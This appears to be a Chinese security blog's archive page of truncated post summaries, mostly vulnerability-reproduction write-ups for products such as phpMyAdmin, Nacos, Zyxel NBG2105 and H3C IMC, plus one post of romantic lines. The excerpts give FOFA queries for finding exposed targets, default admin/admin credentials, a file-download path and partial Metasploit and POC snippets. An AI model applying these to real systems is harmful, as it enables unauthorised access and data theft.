上一页 1 2 3 4 5 6 7 ··· 10 下一页
摘要: 前提 1.可登录phpmyadmin 2.root权限 3.知道网站绝对路径 步骤 1.查看日志是否开启 show variables like '%general%'; 2.开启日志记录 SET GLOBAL general_log='on'; 3.修复日志文件路径 set global gene 阅读全文
posted @ 2021-07-01 22:51 追得上的梦想 阅读(740) 评论(0) 推荐(0) 编辑
摘要: FOFa title="VoIPmonitor" && country="US" 漏洞界面长这样 POC POST /index.php HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl 阅读全文
posted @ 2021-05-20 10:09 追得上的梦想 阅读(393) 评论(0) 推荐(0) 编辑
摘要: 描述 H3C IMC(Intlligent Management Center)智能管理中心是H3C推出的下一代业务只能管理产品。它融合了当前多个产品,以统一风格提供与网络相关的各类管理、控制、监控等功能;同时以开放的组件化的架构原型,向平台及其承载业务提供分布式、分级式交互管理特性;并未业务软件的 阅读全文
posted @ 2021-05-20 09:52 追得上的梦想 阅读(5562) 评论(0) 推荐(0) 编辑
摘要: 今天就是520了,小伙伴们还在等什么,赶紧冲,说不定晚上就能脱单了呢 ¯_(ಥ ‿ ಥ )_/ 温柔娇作型 你像天上的月亮,也像那闪烁的星星,可惜我不是诗人,否则,当写一万首诗来形容你的美丽。 虽然听起来很矫情,但真的想和你过一生。 从晨昏到日暮,从清贫到富足,从少年到老迈,从相遇到余生,只想和你十 阅读全文
posted @ 2021-05-20 08:59 追得上的梦想 阅读(1824) 评论(0) 推荐(0) 编辑
摘要: 描述 网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,商城系统。此次爆出的漏洞有四个,两个注入,两个文件上传。本文主要介绍其中两个文件上传漏洞,漏洞复现以及漏洞工具分享。 fofa语法 "/seller.php?s=/Public/login 阅读全文
posted @ 2021-05-18 20:41 追得上的梦想 阅读(1149) 评论(0) 推荐(0) 编辑
摘要: 0x01 描述 使用powershell上线MSF,使用的不是msf中exploit/multi/handler模块,而是使用的exploit/multi/script/web_delivery类 use exploit/multi/script/web_delivery set target 2 阅读全文
posted @ 2021-05-16 16:43 追得上的梦想 阅读(1967) 评论(0) 推荐(0) 编辑
摘要: 前言 Nacos动态域名和配置服务,英文缩写是Dynamic Naming and Configuration Service, 取的Naming的前两个字母,Configuration的前2个字母,以及Service的首字母组成的。 Fofa title="Nacos" 漏洞复现 POC1:查看用 阅读全文
posted @ 2021-04-24 23:50 追得上的梦想 阅读(1018) 评论(0) 推荐(0) 编辑
摘要: 描述 系统存在弱口令和任意文件下载漏洞 Fofa app="好视通-视频会议" 弱口令 POC admin/admin 登录界面 登录成功 任意文件下载 POC /register/toDownload.do?fileName=敏感文件路径 (https://xxxxxx/register/toDo 阅读全文
posted @ 2021-04-18 12:11 追得上的梦想 阅读(1352) 评论(0) 推荐(0) 编辑
摘要: 描述 存在默认弱口令,攻击者可以获得全部主机控制权限 Fofa title="终端安全系统" && title="V8" 默认口令 admin/admin 登录界面 输入默认口令admin/admin登录成功 点击终端管理 可远程执行命令 阅读全文
posted @ 2021-04-18 11:25 追得上的梦想 阅读(992) 评论(0) 推荐(0) 编辑
摘要: 漏洞描述 Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现后台登陆 Fofa app="ZyXEL-NBG2105" POC&EXP python import requests import sys from requests.packages.urllib3. 阅读全文
posted @ 2021-04-18 10:46 追得上的梦想 阅读(629) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 ··· 10 下一页